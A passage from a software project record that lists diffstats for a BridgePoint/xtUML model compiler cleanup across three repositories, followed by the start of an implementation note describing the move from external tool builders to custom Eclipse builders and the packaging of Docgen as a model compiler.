11 ----\n src\/org.xtuml.bp.mc.c.source\/generate.xml | 29 ---------\n src\/org.xtuml.bp.mc.c.source\/plugin.xml | 75 ----------------------\n src\/org.xtuml.bp.mc.c.source\/src\/org\/xtuml\/bp\/mc\/c\/source\/ExportBuilder.java | 25 --------\n src\/org.xtuml.bp.mc.c.source\/src\/org\/xtuml\/bp\/mc\/c\/source\/MCNature.java | 50 ---------------\n src\/org.xtuml.bp.mc.c.source\/src\/org\/xtuml\/bp\/mc\/c\/source\/MCNewProjectWizard.java | 63 ------------------\n src\/org.xtuml.bp.mc.cpp.source\/.externalToolBuilders\/Build.launch | 15 -----\n src\/org.xtuml.bp.mc.cpp.source\/.externalToolBuilders\/Clean.launch | 10 ---\n src\/org.xtuml.bp.mc.cpp.source\/.gitignore | 2 -\n src\/org.xtuml.bp.mc.cpp.source\/.project | 48 --------------\n src\/org.xtuml.bp.mc.cpp.source\/META-INF\/MANIFEST.MF | 24 -------\n src\/org.xtuml.bp.mc.cpp.source\/about.html | 36 -----------\n src\/org.xtuml.bp.mc.cpp.source\/build.properties | 13 ----\n src\/org.xtuml.bp.mc.cpp.source\/build_settings\/build_setting.properties | 9 ---\n src\/org.xtuml.bp.mc.cpp.source\/defaults\/launch_specification\/Model Compiler.launch | 11 ----\n src\/org.xtuml.bp.mc.cpp.source\/generate.xml | 29 ---------\n src\/org.xtuml.bp.mc.cpp.source\/plugin.xml | 53 ---------------\n src\/org.xtuml.bp.mc.cpp.source\/pom.xml | 47 --------------\n src\/org.xtuml.bp.mc.cpp.source\/src\/org\/xtuml\/bp\/mc\/cpp\/source\/Activator.java | 68 --------------------\n src\/org.xtuml.bp.mc.cpp.source\/src\/org\/xtuml\/bp\/mc\/cpp\/source\/ExportBuilder.java | 25 --------\n src\/org.xtuml.bp.mc.cpp.source\/src\/org\/xtuml\/bp\/mc\/cpp\/source\/MCNature.java | 50 ---------------\n src\/org.xtuml.bp.mc.cpp.source\/src\/org\/xtuml\/bp\/mc\/cpp\/source\/MCNewProjectWizard.java | 63 ------------------\n src\/{org.xtuml.bp.cdt => org.xtuml.bp.mc.docgen}\/.classpath | 0\n src\/{org.xtuml.bp.cdt => org.xtuml.bp.mc.docgen}\/.externalToolBuilders\/Build.launch | 0\n src\/{org.xtuml.bp.cdt => org.xtuml.bp.mc.docgen}\/.externalToolBuilders\/Clean.launch | 0\n src\/{org.xtuml.bp.docgen => org.xtuml.bp.mc.docgen}\/.gitignore | 2 +-\n src\/{org.xtuml.bp.cdt => org.xtuml.bp.mc.docgen}\/.project | 96 ++++++++++++++--------------\n src\/{org.xtuml.bp.mc.none => org.xtuml.bp.mc.docgen}\/.settings\/org.eclipse.jdt.core.prefs | 6 +-\n 
src\/org.xtuml.bp.mc.docgen\/META-INF\/MANIFEST.MF | 21 ++++++\n src\/{org.xtuml.bp.cdt => org.xtuml.bp.mc.docgen}\/about.html | 0\n src\/{org.xtuml.bp.docgen => org.xtuml.bp.mc.docgen}\/build.properties | 9 +--\n src\/{org.xtuml.bp.mc.template => org.xtuml.bp.mc.docgen}\/generate.xml | 2 +-\n src\/org.xtuml.bp.mc.docgen\/plugin.xml | 50 +++++++++++++++\n src\/{org.xtuml.bp.mc.c.source => org.xtuml.bp.mc.docgen}\/pom.xml | 2 +-\n src\/org.xtuml.bp.mc.docgen\/src\/org\/xtuml\/bp\/mc\/docgen\/Activator.java | 64 +++++++++++++++++++\n src\/org.xtuml.bp.mc.docgen\/src\/org\/xtuml\/bp\/mc\/docgen\/DocgenBuilder.java | 300 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n src\/org.xtuml.bp.mc.docgen\/src\/org\/xtuml\/bp\/mc\/docgen\/DocgenNature.java | 48 ++++++++++++++\n src\/org.xtuml.bp.mc.docgen\/src\/org\/xtuml\/bp\/mc\/docgen\/DocgenSetupWizard.java | 43 +++++++++++++\n src\/org.xtuml.bp.mc.docgen\/src\/org\/xtuml\/bp\/mc\/docgen\/preferences\/DocgenPreferencePage.java | 124 ++++++++++++++++++++++++++++++++++++\n src\/org.xtuml.bp.mc.docgen\/src\/org\/xtuml\/bp\/mc\/docgen\/preferences\/DocgenPreferences.java | 82 ++++++++++++++++++++++++\n src\/org.xtuml.bp.mc.java.source\/.classpath | 7 --\n src\/org.xtuml.bp.mc.java.source\/.externalToolBuilders\/Build.launch | 15 -----\n src\/org.xtuml.bp.mc.java.source\/.externalToolBuilders\/Clean.launch | 10 ---\n src\/org.xtuml.bp.mc.java.source\/about.html | 36 -----------\n src\/org.xtuml.bp.mc.java.source\/build.properties | 13 ----\n src\/org.xtuml.bp.mc.java.source\/build_settings\/build_setting.properties | 9 ---\n src\/org.xtuml.bp.mc.java.source\/defaults\/launch_specification\/Model Compiler.launch | 11 ----\n src\/org.xtuml.bp.mc.java.source\/generate.xml | 29 ---------\n src\/org.xtuml.bp.mc.java.source\/plugin.xml | 44 -------------\n src\/org.xtuml.bp.mc.java.source\/pom.xml | 47 --------------\n src\/org.xtuml.bp.mc.java.source\/src\/org\/xtuml\/bp\/mc\/java\/source\/Activator.java | 68 --------------------\n src\/org.xtuml.bp.mc.java.source\/src\/org\/xtuml\/bp\/mc\/java\/source\/ExportBuilder.java | 403 ------------------------------------------------------------------------------------------------------------------\n src\/org.xtuml.bp.mc.java.source\/src\/org\/xtuml\/bp\/mc\/java\/source\/MCNature.java | 49 --------------\n src\/org.xtuml.bp.mc.java.source\/src\/org\/xtuml\/bp\/mc\/java\/source\/MCNewProjectWizard.java | 67 -------------------\n src\/org.xtuml.bp.mc.java.source\/src\/org\/xtuml\/bp\/mc\/java\/source\/SingleQuoteFilterOutputStream.java | 54 ----------------\n src\/{org.xtuml.bp.mc.c.source => org.xtuml.bp.mc.java}\/.classpath | 0\n src\/{org.xtuml.bp.docgen => org.xtuml.bp.mc.java}\/.externalToolBuilders\/Build.launch | 0\n src\/{org.xtuml.bp.docgen => org.xtuml.bp.mc.java}\/.externalToolBuilders\/Clean.launch | 0\n src\/{org.xtuml.bp.mc.java.source => org.xtuml.bp.mc.java}\/.gitignore | 0\n src\/{org.xtuml.bp.mc.java.source => org.xtuml.bp.mc.java}\/.project | 2 +-\n src\/{org.xtuml.bp.mc.java.source => org.xtuml.bp.mc.java}\/.settings\/org.eclipse.jdt.core.prefs | 6 +-\n src\/{org.xtuml.bp.mc.java.source => org.xtuml.bp.mc.java}\/META-INF\/MANIFEST.MF | 10 ++-\n src\/{org.xtuml.bp.docgen => org.xtuml.bp.mc.java}\/about.html | 0\n src\/org.xtuml.bp.mc.java\/build.properties | 7 ++\n src\/{org.xtuml.bp.mc.none => org.xtuml.bp.mc.java}\/generate.xml | 2 +-\n src\/org.xtuml.bp.mc.java\/plugin.xml | 40 ++++++++++++\n src\/{org.xtuml.bp.docgen => org.xtuml.bp.mc.java}\/pom.xml | 3 
+-\n src\/{org.xtuml.bp.mc.c.source\/src\/org\/xtuml\/bp\/mc\/c\/source => org.xtuml.bp.mc.java\/src\/org\/xtuml\/bp\/mc\/java}\/Activator.java | 5 +-\n src\/org.xtuml.bp.mc.java\/src\/org\/xtuml\/bp\/mc\/java\/McJavaBuilder.java | 359 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n src\/org.xtuml.bp.mc.java\/src\/org\/xtuml\/bp\/mc\/java\/McJavaNature.java | 54 ++++++++++++++++\n src\/org.xtuml.bp.mc.java\/src\/org\/xtuml\/bp\/mc\/java\/McJavaSetupWizard.java | 43 +++++++++++++\n src\/org.xtuml.bp.mc.java\/src\/org\/xtuml\/bp\/mc\/java\/SingleQuoteFilterOutputStream.java | 54 ++++++++++++++++\n src\/org.xtuml.bp.mc.masl\/.gitignore | 2 +-\n src\/org.xtuml.bp.mc.masl\/build.properties | 7 +-\n src\/org.xtuml.bp.mc.masl\/build_settings\/build_setting.properties | 9 ---\n src\/org.xtuml.bp.mc.masl\/plugin.xml | 42 +++++++-----\n src\/org.xtuml.bp.mc.masl\/src\/org\/xtuml\/bp\/mc\/masl\/Activator.java | 1 -\n src\/org.xtuml.bp.mc.masl\/src\/org\/xtuml\/bp\/mc\/masl\/MASLEditorPartListener.java | 2 +-\n src\/org.xtuml.bp.mc.masl\/src\/org\/xtuml\/bp\/mc\/masl\/MCNewProjectWizard.java | 49 --------------\n src\/org.xtuml.bp.mc.masl\/src\/org\/xtuml\/bp\/mc\/masl\/MaslExportBuilder.java | 57 +++--------------\n src\/org.xtuml.bp.mc.masl\/src\/org\/xtuml\/bp\/mc\/masl\/{MCNature.java => MaslExportNature.java} | 26 ++++----\n src\/org.xtuml.bp.mc.masl\/src\/org\/xtuml\/bp\/mc\/masl\/MaslExportSetupWizard.java | 43 +++++++++++++\n src\/{org.xtuml.bp.mc.cpp.source => org.xtuml.bp.mc.mc3020}\/.classpath | 0\n src\/{org.xtuml.bp.mc.c.source => org.xtuml.bp.mc.mc3020}\/.externalToolBuilders\/Build.launch | 0\n src\/{org.xtuml.bp.mc.c.source => org.xtuml.bp.mc.mc3020}\/.externalToolBuilders\/Clean.launch | 0\n src\/{org.xtuml.bp.mc.c.source => org.xtuml.bp.mc.mc3020}\/.gitignore | 0\n src\/{org.xtuml.bp.docgen => org.xtuml.bp.mc.mc3020}\/.project | 2 +-\n src\/{org.xtuml.bp.mc.cpp.source => org.xtuml.bp.mc.mc3020}\/.settings\/org.eclipse.jdt.core.prefs | 6 +-\n src\/{org.xtuml.bp.mc.c.source => org.xtuml.bp.mc.mc3020}\/META-INF\/MANIFEST.MF | 11 ++--\n src\/{org.xtuml.bp.mc.c.source => org.xtuml.bp.mc.mc3020}\/about.html | 0\n src\/org.xtuml.bp.mc.mc3020\/build.properties | 7 ++\n src\/{org.xtuml.bp.docgen => org.xtuml.bp.mc.mc3020}\/generate.xml | 4 +-\n src\/org.xtuml.bp.mc.mc3020\/plugin.xml | 53 +++++++++++++++\n src\/{org.xtuml.bp.mc.none => org.xtuml.bp.mc.mc3020}\/pom.xml | 2 +-\n src\/org.xtuml.bp.mc.mc3020\/src\/org\/xtuml\/bp\/mc\/mc3020\/Activator.java | 64 +++++++++++++++++++\n src\/org.xtuml.bp.mc.mc3020\/src\/org\/xtuml\/bp\/mc\/mc3020\/Mc3020Builder.java | 101 +++++++++++++++++++++++++++++\n src\/org.xtuml.bp.mc.mc3020\/src\/org\/xtuml\/bp\/mc\/mc3020\/Mc3020Nature.java | 59 +++++++++++++++++\n src\/org.xtuml.bp.mc.mc3020\/src\/org\/xtuml\/bp\/mc\/mc3020\/Mc3020SetupWizard.java | 91 ++++++++++++++++++++++++++\n src\/org.xtuml.bp.mc.mc3020\/src\/org\/xtuml\/bp\/mc\/mc3020\/preferences\/Mc3020PreferenceControl.java | 119 ++++++++++++++++++++++++++++++++++\n src\/org.xtuml.bp.mc.mc3020\/src\/org\/xtuml\/bp\/mc\/mc3020\/preferences\/Mc3020PreferencePage.java | 45 +++++++++++++\n src\/org.xtuml.bp.mc.mc3020\/src\/org\/xtuml\/bp\/mc\/mc3020\/preferences\/Mc3020Preferences.java | 79 +++++++++++++++++++++++\n src\/org.xtuml.bp.mc.mc3020\/src\/org\/xtuml\/bp\/mc\/mc3020\/util\/CDTUtil.java | 217 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n src\/org.xtuml.bp.mc.none\/.classpath | 7 --\n 
src\/org.xtuml.bp.mc.none\/.externalToolBuilders\/Build.launch | 15 -----\n src\/org.xtuml.bp.mc.none\/.externalToolBuilders\/Clean.launch | 10 ---\n src\/org.xtuml.bp.mc.none\/.gitignore | 2 -\n src\/org.xtuml.bp.mc.none\/.project | 48 --------------\n src\/org.xtuml.bp.mc.none\/META-INF\/MANIFEST.MF | 24 -------\n src\/org.xtuml.bp.mc.none\/about.html | 36 -----------\n src\/org.xtuml.bp.mc.none\/build.properties | 8 ---\n src\/org.xtuml.bp.mc.none\/plugin.xml | 57 -----------------\n src\/org.xtuml.bp.mc.none\/src\/org\/xtuml\/bp\/mc\/none\/Activator.java | 72 ---------------------\n src\/org.xtuml.bp.mc.none\/src\/org\/xtuml\/bp\/mc\/none\/ExportBuilder.java | 34 ----------\n src\/org.xtuml.bp.mc.none\/src\/org\/xtuml\/bp\/mc\/none\/MCNature.java | 63 ------------------\n src\/org.xtuml.bp.mc.none\/src\/org\/xtuml\/bp\/mc\/none\/MCNewProjectWizard.java | 57 -----------------\n src\/org.xtuml.bp.mc.systemc.source\/.classpath | 7 --\n src\/org.xtuml.bp.mc.systemc.source\/.externalToolBuilders\/Build.launch | 15 -----\n src\/org.xtuml.bp.mc.systemc.source\/.externalToolBuilders\/Clean.launch | 10 ---\n src\/org.xtuml.bp.mc.systemc.source\/.gitignore | 2 -\n src\/org.xtuml.bp.mc.systemc.source\/.project | 48 --------------\n src\/org.xtuml.bp.mc.systemc.source\/.settings\/org.eclipse.jdt.core.prefs | 7 --\n src\/org.xtuml.bp.mc.systemc.source\/META-INF\/MANIFEST.MF | 24 -------\n src\/org.xtuml.bp.mc.systemc.source\/about.html | 36 -----------\n src\/org.xtuml.bp.mc.systemc.source\/build.properties | 12 ----\n src\/org.xtuml.bp.mc.systemc.source\/build_settings\/build_setting.properties | 9 ---\n src\/org.xtuml.bp.mc.systemc.source\/defaults\/launch_specification\/Model Compiler.launch | 11 ----\n src\/org.xtuml.bp.mc.systemc.source\/generate.xml | 29 ---------\n src\/org.xtuml.bp.mc.systemc.source\/plugin.xml | 53 ---------------\n src\/org.xtuml.bp.mc.systemc.source\/pom.xml | 47 --------------\n src\/org.xtuml.bp.mc.systemc.source\/src\/org\/xtuml\/bp\/mc\/systemc\/source\/Activator.java | 68 --------------------\n src\/org.xtuml.bp.mc.systemc.source\/src\/org\/xtuml\/bp\/mc\/systemc\/source\/ExportBuilder.java | 25 --------\n src\/org.xtuml.bp.mc.systemc.source\/src\/org\/xtuml\/bp\/mc\/systemc\/source\/MCNature.java | 50 ---------------\n src\/org.xtuml.bp.mc.systemc.source\/src\/org\/xtuml\/bp\/mc\/systemc\/source\/MCNewProjectWizard.java | 63 ------------------\n src\/org.xtuml.bp.mc.template\/.classpath | 7 --\n src\/org.xtuml.bp.mc.template\/.externalToolBuilders\/Build.launch | 15 -----\n src\/org.xtuml.bp.mc.template\/.externalToolBuilders\/Clean.launch | 10 ---\n src\/org.xtuml.bp.mc.template\/.gitignore | 1 -\n src\/org.xtuml.bp.mc.template\/.project | 48 --------------\n src\/org.xtuml.bp.mc.template\/META-INF\/MANIFEST.MF | 14 ----\n src\/org.xtuml.bp.mc.template\/Readme.txt | 1 -\n src\/org.xtuml.bp.mc.template\/about.html | 36 -----------\n src\/org.xtuml.bp.mc.template\/build.properties | 8 ---\n src\/org.xtuml.bp.mc.template\/icons\/newexprj_wiz.gif | Bin 607 -> 0 bytes\n src\/org.xtuml.bp.mc.template\/plugin.xml | 25 --------\n src\/org.xtuml.bp.mc.template\/pom.xml | 47 --------------\n src\/org.xtuml.bp.mc.template\/src\/org\/xtuml\/bp\/mc\/template\/Activator.java | 50 ---------------\n src\/org.xtuml.bp.mc.template\/src\/org\/xtuml\/bp\/mc\/template\/ModelCompilerSection.java | 216 --------------------------------------------------------------\n src\/org.xtuml.bp.mc.template\/src\/org\/xtuml\/bp\/mc\/template\/ModelCompilerTemplateWizard.java | 36 -----------\n 
src\/org.xtuml.bp.mc.template\/templates\/model_compiler\/.settings\/org.eclipse.jdt.core.prefs | 8 ---\n src\/org.xtuml.bp.mc.template\/templates\/model_compiler\/build_settings\/build_setting.properties | 9 ---\n src\/org.xtuml.bp.mc.template\/templates\/model_compiler\/defaults\/launch_specification\/Model Compiler.launch | 11 ----\n src\/org.xtuml.bp.mc.template\/templates\/model_compiler\/generate.xml | 29 ---------\n src\/org.xtuml.bp.mc.template\/templates\/model_compiler\/java\/Activator.java | 68 --------------------\n src\/org.xtuml.bp.mc.template\/templates\/model_compiler\/java\/ExportBuilder.java | 25 --------\n src\/org.xtuml.bp.mc.template\/templates\/model_compiler\/java\/MCNature.java | 49 --------------\n src\/org.xtuml.bp.mc.template\/templates\/model_compiler\/java\/MCNewProjectWizard.java | 65 -------------------\n src\/org.xtuml.bp.mc\/.settings\/org.eclipse.jdt.core.prefs | 6 +-\n src\/org.xtuml.bp.mc\/META-INF\/MANIFEST.MF | 8 +--\n src\/org.xtuml.bp.mc\/build.properties | 2 +-\n src\/org.xtuml.bp.mc\/plugin.xml | 120 +++++++++++++++++-----------------\n src\/org.xtuml.bp.mc\/src\/org\/xtuml\/bp\/mc\/AbstractActivator.java | 47 --------------\n src\/org.xtuml.bp.mc\/src\/org\/xtuml\/bp\/mc\/AbstractExportBuilder.java | 22 +++----\n src\/org.xtuml.bp.mc\/src\/org\/xtuml\/bp\/mc\/AbstractNature.java | 215 ++++---------------------------------------------------------\n src\/org.xtuml.bp.mc\/src\/org\/xtuml\/bp\/mc\/AbstractNewProjectWizard.java | 88 -------------------------\n src\/org.xtuml.bp.mc\/src\/org\/xtuml\/bp\/mc\/AbstractProperties.java | 74 ---------------------\n src\/org.xtuml.bp.mc\/src\/org\/xtuml\/bp\/mc\/MCBuilderArgumentHandler.java | 155 --------------------------------------------\n src\/org.xtuml.bp.mc\/src\/org\/xtuml\/bp\/mc\/PreBuilder.java | 34 ++++++++++\n src\/org.xtuml.bp.mc\/src\/org\/xtuml\/bp\/mc\/tools\/SwitchProjectModelCompilerAction.java | 17 ++---\n src\/org.xtuml.bp.mc\/src\/org\/xtuml\/bp\/mc\/tools\/SwitchProjectModelCompilerWizard.java | 140 +++++++++++++++++++++++-----------------\n src\/org.xtuml.bp.mc\/src\/org\/xtuml\/bp\/mc\/utilities\/ModelCompilerConsoleManager.java | 69 ++++++++++++++++++++\n src\/org.xtuml.bp.mc\/src\/org\/xtuml\/bp\/mc\/utilities\/ProcessUtil.java | 63 ++++++++++++++++++\n src\/org.xtuml.bp.pkg-feature\/feature.xml | 38 +----------\n src\/org.xtuml.bp.ui.canvas\/.project | 3 +-\n src\/org.xtuml.bp.ui.marking\/.project | 5 +-\n src\/org.xtuml.bp.welcome\/META-INF\/MANIFEST.MF | 1 -\n utilities\/build\/configure_build_process.sh | 4 +-\n utilities\/build\/configure_external_dependencies.sh | 12 ++--\n utilities\/build\/preferences\/org.eclipse.core.resources.prefs | 2 +-\n 330 files changed, 4486 insertions(+), 7473 deletions(-)\n----\n\n- fork\/repository: leviathan747\/bptest\n- branch: 11491_mcs\n\n----\n releng\/org.xtuml.bp.releng.parent.tests\/pom.xml | 1 -\n src\/org.xtuml.bp.core.test\/.project | 3 ++-\n src\/org.xtuml.bp.core.test\/src\/org\/xtuml\/bp\/core\/test\/NumberingTestGenerics.java | 2 ++\n src\/org.xtuml.bp.core.test\/src\/org\/xtuml\/bp\/core\/test\/TigerNatureTestGenerics.java | 2 --\n src\/org.xtuml.bp.core.test\/src\/org\/xtuml\/bp\/core\/test\/deployments\/DeploymentExportTests.java | 4 ++--\n src\/org.xtuml.bp.ui.canvas.test\/META-INF\/MANIFEST.MF | 1 -\n src\/org.xtuml.bp.welcome.test\/Test_Readme.txt | 1 -\n src\/org.xtuml.internal.test\/.classpath | 7 -------\n src\/org.xtuml.internal.test\/.externalToolBuilders\/Build.launch | 14 --------------\n 
src\/org.xtuml.internal.test\/.externalToolBuilders\/Clean.launch | 10 ----------\n src\/org.xtuml.internal.test\/.gitignore | 3 ---\n src\/org.xtuml.internal.test\/.project | 48 ------------------------------------------------\n src\/org.xtuml.internal.test\/META-INF\/MANIFEST.MF | 15 ---------------\n src\/org.xtuml.internal.test\/build.properties | 5 -----\n src\/org.xtuml.internal.test\/plugin.xml | 30 ------------------------------\n src\/org.xtuml.internal.test\/pom.xml | 16 ----------------\n src\/org.xtuml.internal.test\/src\/org\/xtuml\/internal\/test\/NewCBTestWizard1.java | 97 -------------------------------------------------------------------------------------------------\n src\/org.xtuml.internal.test\/src\/org\/xtuml\/internal\/test\/NewCBTestWizard2.java | 179 -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n src\/org.xtuml.internal.test\/src\/org\/xtuml\/internal\/test\/NewMCTestWizard1.java | 108 ------------------------------------------------------------------------------------------------------------\n src\/org.xtuml.internal.test\/src\/org\/xtuml\/internal\/test\/NewMCTestWizard2.java | 99 ---------------------------------------------------------------------------------------------------\n src\/org.xtuml.internal.test\/src\/org\/xtuml\/internal\/test\/TestPlugin.java | 92 --------------------------------------------------------------------------------------------\n src\/org.xtuml.internal.test\/src\/org\/xtuml\/internal\/test\/WizardCodeBuilderChooserPage.java | 111 ---------------------------------------------------------------------------------------------------------------\n 22 files changed, 6 insertions(+), 842 deletions(-)\n----\n\n- fork\/repository: leviathan747\/mc\n- branch: 11491_mcs\n\n----\n model\/docgen\/.cproject | 120 ---------------------------------------------------------------------------------------\n model\/docgen\/.externalToolBuilders\/Model Compiler.launch | 15 -----------\n model\/docgen\/.externalToolBuilders\/org.eclipse.cdt.managedbuilder.core.ScannerConfigBuilder (2).launch | 7 ------\n model\/docgen\/.externalToolBuilders\/org.eclipse.cdt.managedbuilder.core.genmakebuilder (2).launch | 7 ------\n model\/docgen\/.project | 38 ++--------------------------\n model\/document\/.cproject | 120 ---------------------------------------------------------------------------------------\n model\/document\/.externalToolBuilders\/Model Compiler.launch | 10 --------\n model\/document\/.project | 33 ------------------------\n model\/document\/.settings\/com.mentor.nucleus.bp.ui.project.preferences.prefs | 2 +-\n model\/document\/gen\/domain.mark | 218 --------------------------------------------------------------------------------------------------------------------------------------------------------------\n model\/document\/gen\/system.mark | 256 ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n model\/escher\/.classpath | 8 ------\n model\/escher\/.externalToolBuilders\/Model Compiler.launch | 16 ------------\n model\/escher\/.options | 13 ----------\n model\/escher\/.project | 15 ++---------\n model\/escher\/.template | 4 ---\n model\/escher\/META-INF\/MANIFEST.MF | 11 --------\n model\/escher\/about.html | 36 ---------------------------\n model\/escher\/build.properties | 11 
--------\n model\/escher\/plugin.properties | 10 --------\n model\/integrity\/.cproject | 78 ---------------------------------------------------------\n model\/integrity\/.externalToolBuilders\/Model Compiler.launch | 14 -----------\n model\/integrity\/.externalToolBuilders\/org.eclipse.cdt.managedbuilder.core.ScannerConfigBuilder (3).launch | 7 ------\n model\/integrity\/.externalToolBuilders\/org.eclipse.cdt.managedbuilder.core.genmakebuilder (3).launch | 7 ------\n model\/integrity\/.project | 37 ++-------------------------\n model\/masl\/.cproject | 120 ---------------------------------------------------------------------------------------\n model\/masl\/.externalToolBuilders\/Model Compiler.launch | 14 -----------\n model\/masl\/.externalToolBuilders\/org.eclipse.cdt.managedbuilder.core.ScannerConfigBuilder (1).launch | 7 ------\n model\/masl\/.externalToolBuilders\/org.eclipse.cdt.managedbuilder.core.genmakebuilder (1).launch | 7 ------\n model\/masl\/.project | 38 ++--------------------------\n model\/maslin\/.cproject | 120 ---------------------------------------------------------------------------------------\n model\/maslin\/.externalToolBuilders\/Model Compiler.launch | 14 -----------\n model\/maslin\/.externalToolBuilders\/org.eclipse.cdt.managedbuilder.core.ScannerConfigBuilder (3).launch | 7 ------\n model\/maslin\/.externalToolBuilders\/org.eclipse.cdt.managedbuilder.core.genmakebuilder (3).launch | 7 ------\n model\/maslin\/.project | 38 ++--------------------------\n model\/maslout\/.externalToolBuilders\/Model Compiler.launch | 16 ------------\n model\/maslout\/.project | 14 ++---------\n model\/mcooa\/.cproject | 120 ---------------------------------------------------------------------------------------\n model\/mcooa\/.externalToolBuilders\/Model Compiler.launch | 14 -----------\n model\/mcooa\/.externalToolBuilders\/org.eclipse.cdt.managedbuilder.core.ScannerConfigBuilder.launch | 7 ------\n model\/mcooa\/.externalToolBuilders\/org.eclipse.cdt.managedbuilder.core.genmakebuilder.launch | 7 ------\n model\/mcooa\/.project | 42 -------------------------------\n model\/mcooa\/.settings\/com.mentor.nucleus.bp.ui.project.preferences.prefs | 4 ---\n model\/mcooa\/src\/readme.txt | 1 -\n model\/mcshared\/.cproject | 120 ---------------------------------------------------------------------------------------\n model\/mcshared\/.externalToolBuilders\/Model Compiler.launch | 14 -----------\n model\/mcshared\/.externalToolBuilders\/org.eclipse.cdt.managedbuilder.core.ScannerConfigBuilder (1).launch | 7 ------\n model\/mcshared\/.externalToolBuilders\/org.eclipse.cdt.managedbuilder.core.genmakebuilder (1).launch | 7 ------\n model\/mcshared\/.project | 47 ----------------------------------\n model\/mcshared\/src\/.gitignore | 3 ---\n 50 files changed, 13 insertions(+), 1875 deletions(-)\n----\n\n== 9 Document References\n\n. [[dr-1]] https:\/\/support.onefact.net\/issues\/11491[11491 - Clean up model compiler projects]\n. [[dr-2]] https:\/\/support.onefact.net\/issues\/10345[10345 - update unit tests as needed to account for the move to Eclipse Oxygen]\n. [[dr-3]] https:\/\/support.onefact.net\/issues\/11636[11636 - Update build server with new host version of BP]\n. [[dr-4]] https:\/\/support.onefact.net\/issues\/11637[11637 - Upgrade welcome plugin projects]\n. [[dr-5]] https:\/\/github.com\/xtuml\/graveyard\/tree\/master\/internal\/Documentation_archive\/20121102\/technical\/notes\/dts0100782775[Documentation associated with the introduction of the model compilers]\n. 
[[dr-6]] https:\/\/support.onefact.net\/issues\/11638[11638 - Create a generic RSL model compiler]\n. [[dr-7]] https:\/\/support.onefact.net\/issues\/11640[11640 - Update CLI to run truely headless]\n. [[dr-8]] https:\/\/support.onefact.net\/issues\/11639[11639 - Reintroduce a model compiler template plugin]\n\n---\n\nThis work is licensed under the Creative Commons CC0 License\n\n---\n","old_contents":"= Clean up model compiler projects\n\nxtUML Project Implementation Note\n\n== 1 Abstract\n\nThe model compiler plugins need a refresh. This implementation documents cleanup\nitems handled as part of this work.\n\n== 2 Introduction and Background\n\n2.1 Background\n\nThe model compilers were first introduced as an external tool builder. An\nexternal tool builder is a flexible mechanism provided by Eclipse to execute\nprograms outside Eclipse during a build. Plugins were created to configure\nthese builders on project creation and assure that they remain up to date. This\ndesign was made without a full understanding of the Eclipse build platform as\nthere is no reason to use an external tool builder when the model compiler is\nitself shipped with the project. It creates messy files in the application\ndirectory in version control and does not provide much configuration\nflexibility. A custom builder provided by the model compiler plugin would be\nbetter.\n\nMore information about the introduction of multiple model compilers in\nBridgePoint can be found at <<dr-5>>.\n\nDocgen is another model compiler provided by BridgePoint, however it was not\nimplemented as a builder or external builder but through a context menu item.\nDocgen is logically a model compiler and it would simplify the interface to\npackage it as just another model compiler.\n\n2.2 Current model compiler flow\n\nCurrently, model compilers are invoked as two separate builders. First a builder\ncalled \"Model Compiler Pre-Build\" runs. This is a customized model export which\ninvokes the OAL parser, sets up the build space, collects all referred to data,\nremoves proxies and graphical instances and outputs one `.sql` file in the\n`code_generation` folder. In some cases pre-builder does not parse OAL (e.g.\nMASL export) and sometimes it does not run at all (if the OAL is fully parsed\nand no files in `models\/` are newer than the output file in `code_generation`).\nNext, an external tool builder gets invoked which points to the `xtumlmc_build`\nPerl script packaged with BridgePoint.\n\n== 3 Requirements\n\n3.1 Model compilers shall stop using external tool builders\n\n3.2 Docgen shall be implemented as a model compiler\n\n3.3 BridgePoint shall support multiple model compilers on a single project\n\n3.4 Project preferences shall be moved to the \"Properties\" menu\n\n== 4 Work Required\n\n4.1 Updating model compiler builders\n\nWith a move toward real builders, there is no longer any need for a separate\nbuilder for the pre-build process. Instead, model compiler builders inherit from\nthe `AbstractExportBuilder` class which provides the pre-build functionality.\nThe first step for any model compiler builder is to execute the `preBuild`\nmethod. For some builders (like the MASL builder) a parameter is passed to\nensure that no OAL is parsed during pre-build. Note that since pre-build is\ninherited behavior for every model compiler it will run first in every model\ncompiler in the build chain, however it still does all the checks to see if a\nrun is necessary. 
If multiple model compilers are enabled on a single project,\nit is likely that in the second model compiler pre-build that nothing will occur\nbecause pre-build was handled in the first model compiler pre-build.\n\nTake an example where docgen and MC-3020 are enabled on a project. If MC-3020 is\nfirst in the build chain, it will execute a pre-build, generate code and exit.\nNext docgen will invoke a pre-build but will see that no source files are newer\nthan the existing pre-build output and short circuit. The docgen builder will\nthen run and exit. On the other hand, if docgen runs first, pre-build will\nexecute (skipping OAL parse) and docgen will execute and then exit. Next MC-3020\npre-build will run and notice that the model is not parsed. In this case the\npre-build will recreate the output file. Then MC-3020 will generate code and\nexit.\n\nThis design assures that output will _always_ be present when necessary and that\nunnecessary pre-builds are avoided in the majority of cases.\n\n4.1.1 MC-3020\n\nAll of the MC-3020 based model compilers were consolidated into one plugin\ncalled `org.xtuml.bp.mc.mc3020`. The builder was updated to remove the\nfunctionality which sets up and invokes the external tool builder. Instead a new\nbuilder `Mc3020Builder` was introduced which first runs pre-builder, then\ninvokes `xtumlmc_build` and handles all of the input and output. The string\nidentifiers for the MC nature and builder have been changed. Legacy projects\nwith the old identifiers will need to be upgraded. See <<5 Implementation\nComments>> for more information.\n\n4.1.1.1 Preferences\n\nA new preferences page was added for projects configured with the MC-3020\nnature. The target language for MC-3020 can be configured. The default is C.\n\nimage::mc3020_prefs.png[mc3020_prefs.png,width=75%]\n\n4.1.1.2 CDT for MC-3020 projects\n\nDuring creation of an MC-3020 project or setting of model compilers, the\npreferences in the previous section can be set. Additionally, the project can\nbe converted to a C\/C{plus}{plus} project (adds the CDT nature and builders to\nthe project). The default for this option is unchecked. MC-3020 many times is\nused just for code generation and other C\/C{plus}{plus} build tools are\nrequired to build the source for the chosen target.\n\nimage::new_mc3020_project.png[new_mc3020_project.png,width=75%]\n\n4.1.1.3 `org.xtuml.bp.cdt` plugin\n\nThere used to be a plugin called `org.xtuml.bp.cdt`. Its only purpose in life\nwas to wait for projects to be created. When a project was created that had one\nof the MC-3020 flavor model compilers set, it automatically set it to a CDT\nproject. This plugin has been completely removed now that the 